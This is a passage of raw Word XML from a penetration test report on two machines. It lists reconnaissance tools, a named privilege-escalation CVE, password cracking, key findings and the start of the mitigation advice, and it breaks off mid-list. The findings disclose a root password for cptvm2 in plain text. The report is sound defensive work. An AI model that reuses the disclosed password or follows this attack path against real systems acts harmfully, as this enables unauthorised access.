        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Based on our observations</w:t>
      </w:r>
      <w:r w:rsidR="00B44F9B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your organization’s computer security practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, it is likely that compromise of more machines would have been a</w:t>
      </w:r>
      <w:r w:rsidR="0088108E" w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chieved had it been permitted by</w:t>
      </w:r>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> our written agreement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394B1CF2" w14:textId="289417CE" w:rsidR="001F2CE7" w:rsidRPr="00204DD5" w:rsidRDefault="005C79B8" w:rsidP="00AE6C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="001F2CE7" w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e are able to make concrete, actionable recommendations which will significantly improve the organization’s security posture. These recommendations will appear later in this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D5C57" w14:textId="77777777" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc422058350"/>
      <w:r>
        <w:t>APPROACH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="700C7B46" w14:textId="6CACE588" w:rsidR="00AE6C4E" w:rsidRPr="00204DD5" w:rsidRDefault="001F2CE7" w:rsidP="00AE6C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In its basic form, our approach was as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC3E5EB" w14:textId="77777777" w:rsidR="001F2CE7" w:rsidRPr="00204DD5" w:rsidRDefault="001F2CE7" w:rsidP="001F2CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Passive Reconnaissance—Not Performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA0FD6" w14:textId="77777777" w:rsidR="001F2CE7" w:rsidRPr="00204DD5" w:rsidRDefault="001F2CE7" w:rsidP="001F2CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D652799" w14:textId="7BD875A0" w:rsidR="001F2CE7" w:rsidRPr="00204DD5" w:rsidRDefault="001F2CE7" w:rsidP="001F2CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Observation of network traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B385AEB" w14:textId="3C288E2A" w:rsidR="00AF0D14" w:rsidRDefault="00AF0D14" w:rsidP="00AF0D14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port scanning / service identification</w:t>
      </w:r>
      <w:r w:rsidR="00CB74C1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / IP protocol scanning</w:t>
      </w:r>
      <w:r w:rsidR="009F0749">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FDD68" w14:textId="7AE2C5A9" w:rsidR="00BD62D2" w:rsidRPr="00204DD5" w:rsidRDefault="00BD62D2" w:rsidP="00AF0D14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SNMP scanning</w:t>
      </w:r>
      <w:r w:rsidR="009F0749">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using onesixtyone and snmpcheck)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4206B629" w14:textId="576EF517" w:rsidR="00AF0D14" w:rsidRDefault="00AF0D14" w:rsidP="00AF0D14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B247F65" w14:textId="47666CC0" w:rsidR="00ED0152" w:rsidRPr="00204DD5" w:rsidRDefault="00204D62" w:rsidP="00ED0152">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Google Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687164B" w14:textId="3894B9D6" w:rsidR="00AF0D14" w:rsidRDefault="00AF0D14" w:rsidP="00AF0D14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCBA79" w14:textId="28928D7B" w:rsidR="00ED0152" w:rsidRPr="00204DD5" w:rsidRDefault="00606B50" w:rsidP="00ED0152">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Local Privilege Escalation: CVE 2004-1235, OSVDB-ID 12791, EDB-ID 778</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD55E3" w14:textId="62F92519" w:rsidR="00AF0D14" w:rsidRDefault="00AF0D14" w:rsidP="00AF0D14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2F902" w14:textId="75A7BB7B" w:rsidR="00F073CA" w:rsidRPr="00204DD5" w:rsidRDefault="00F073CA" w:rsidP="00F073CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA0E73" w14:textId="0B110953" w:rsidR="00AF0D14" w:rsidRPr="00204DD5" w:rsidRDefault="00AF0D14" w:rsidP="00AF0D14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E22E6F" w14:textId="77777777" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc422058351"/>
      <w:r>
        <w:t>SCOPE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="651C117E" w14:textId="376948D3" w:rsidR="00AE6C4E" w:rsidRPr="00204DD5" w:rsidRDefault="00AF0D14" w:rsidP="00AE6C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The scope of this penetration test comprised attem</w:t>
      </w:r>
      <w:r w:rsidR="00657B65">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pting to compromise two targets</w:t>
      </w:r>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and to harvest their root passwords as proof of the compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D7FF52" w14:textId="77777777" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc422058352"/>
      <w:r>
        <w:t>KEY FINDINGS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="796A9985" w14:textId="33AE4729" w:rsidR="00AE6C4E" w:rsidRPr="00204DD5" w:rsidRDefault="00204DD5" w:rsidP="00AE6C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The key findings we identified during this penetration test include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1765B3C5" w14:textId="14998F95" w:rsidR="00204DD5" w:rsidRDefault="00204DD5" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Plaintext </w:t>
      </w:r>
      <w:r w:rsidR="00BC52EF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>protocol ports were open</w:t>
      </w:r>
      <w:r w:rsidR="00997570">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FTP,</w:t>
      </w:r>
      <w:r w:rsidR="00390EF6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> telnet</w:t>
      </w:r>
      <w:r w:rsidR="00997570">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, POP2, SNMPv1</w:t>
      </w:r>
      <w:r w:rsidR="00390EF6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00BC52EF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB10AB" w14:textId="4795E613" w:rsidR="00BC52EF" w:rsidRPr="00204DD5" w:rsidRDefault="0072078B" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidR="00BC52EF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> passing of the root password of one target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was occurring every 40 seconds as part of a periodic FTP exchange.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF2AD8" w14:textId="133FF986" w:rsidR="00204DD5" w:rsidRDefault="005508F2" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Six</w:t>
      </w:r>
      <w:r w:rsidR="00BC52EF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> weak passwords were in use</w:t>
      </w:r>
      <w:r w:rsidR="00D576D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e. were cracked with a dictionary attack)</w:t>
      </w:r>
      <w:r w:rsidR="00BC52EF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000C7DE0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The seventh password—</w:t>
      </w:r>
      <w:r w:rsidR="000C7DE0" w:rsidRPr="00B16C1D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>moon458$</w:t>
      </w:r>
      <w:r w:rsidR="000C7DE0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, the root password for cptvm2—is short enough to be vulnerable to a brute force attack, given some time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB200E" w14:textId="33F7E7C9" w:rsidR="00BC52EF" w:rsidRPr="00204DD5" w:rsidRDefault="00BC52EF" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00F25A1B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of SNMP scanning on one target—using the well-known community string “public”—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allowed a quick determination of the s</w:t>
      </w:r>
      <w:r w:rsidR="007C7807">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ystem software that was running.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C7807">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes finding an explo</w:t>
      </w:r>
      <w:r w:rsidR="00657B65">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it for the target</w:t>
      </w:r>
      <w:r w:rsidR="009E7605">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> much easier.</w:t>
      </w:r>
      <w:r w:rsidR="009E7605">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="009E7605">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Although, this information was not needed in the attack since the root password of one target was given away via the FTP protocol.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47392A8E" w14:textId="1244D70F" w:rsidR="00204DD5" w:rsidRDefault="00BC52EF" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System software is not being kept up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8FA0B8" w14:textId="1FB53F56" w:rsidR="00ED670B" w:rsidRDefault="00ED670B" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cptvm1</w:t>
      </w:r>
      <w:r w:rsidR="007D09E6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> supports SSH 1.5</w:t>
      </w:r>
      <w:r w:rsidR="00A6149F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which is insecure. SSH 2.0</w:t>
      </w:r>
      <w:r w:rsidR="007D09E6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> should always be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186D28E2" w14:textId="4237A9A9" w:rsidR="00364BE3" w:rsidRDefault="00364BE3" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cptvm2 supports SSH 1.0, which is insecure. SSH 2.0 should always be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F51B6E9" w14:textId="77777777" w:rsidR="00411DB9" w:rsidRDefault="00411DB9" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Malware not yet detectable by scanners may be present on both machines due to the presence of suspicious unexpectedly-open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5A1E7" w14:textId="6832D940" w:rsidR="00411DB9" w:rsidRDefault="00411DB9" w:rsidP="00411DB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On cptvm1, we found UDP port 663 open. Although this port has been designated by IANA for “Purenoise”, it has </w:t>
      </w:r>
      <w:r w:rsidR="00E43413">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>also been associated with malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2552CE" w14:textId="0A749722" w:rsidR="00411DB9" w:rsidRPr="00204DD5" w:rsidRDefault="00411DB9" w:rsidP="00411DB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On cptvm2, we found TCP port 1015 open. </w:t>
      </w:r>
      <w:r w:rsidR="00E43413">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is currently reserved by IANA and should not be in use by any application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369F6C4" w14:textId="77777777" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc422058353"/>
      <w:r>
        <w:t>RECOMMENDATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4CF0FD9B" w14:textId="576A79A3" w:rsidR="00AE6C4E" w:rsidRDefault="007A6DCF" w:rsidP="00204DD5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The findings above may be mitigated as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C35F9" w14:textId="7E7F53BB" w:rsidR="006301C2" w:rsidRDefault="006301C2" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Plaintext Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC95768" w14:textId="378F7CE8" w:rsidR="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="006301C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not use </w:t>
      </w:r>
      <w:r w:rsidR="006301C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plaintext protocols</w:t>
      </w:r>
      <w:r w:rsidR="006301C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP and telnet. Use SSH in their place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC2F75" w14:textId="662FDCB5" w:rsidR="006301C2" w:rsidRDefault="006301C2" w:rsidP="006301C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use HTTP only for general web surfing that requires no security. Anything sensitive (e.g. e-commerce, e-banking, etc.) should </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> be done via HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6226113B" w14:textId="0760AA8F" w:rsidR="00997570" w:rsidRDefault="00997570" w:rsidP="006301C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
